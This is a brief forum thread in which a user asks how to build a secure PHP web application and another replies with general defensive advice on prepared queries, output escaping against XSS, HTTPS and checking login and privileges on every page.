Secure Application

[slice]

Which are best guidelines to follow for developing secure web application in php ?
Thank You.

[CornedBee]

The primary guideline is simple: check all user input. Never let anything unchecked slip into database queries or output. Never use string concatenation to build queries; use prepared queries instead. (PEAR::DB emulates them for drivers that don't have native support, like the old MySQL. As does PDO.) Never directly output anything coming from the user; always at least escape it with htmlentities().
The SQL thing protects you against SQL injection, which compromises the security of your data. The output thing protects you against XSS attacks, which compromise the authenticity of your site's actions and can be used to leak session cookies, passwords, etc.

Beyond that, make sure the site only accepts requests over HTTPS and get a properly signed certificate. Have a proper login system: make sure nothing can be reached without proper authorization. The security of accounts is, in the end, a matter of the users. You can reject really bad passwords, but you can't prevent the user from writing it down and leave it where others find it.

That's all there is to it, really. It's mostly a matter of being careful, not forgetting anything. A single unchecked query is often enough.

[slice]

How to make sure that no request to page is reaching without proper authentication ?

[CornedBee]

Before doing anything else on a page, check that there is a valid user logged in and with the necessary privileges (e.g. user administration requires admin privileges).

Login systems have been discussed a few times here, so searching the forum should turn up a few useful threads.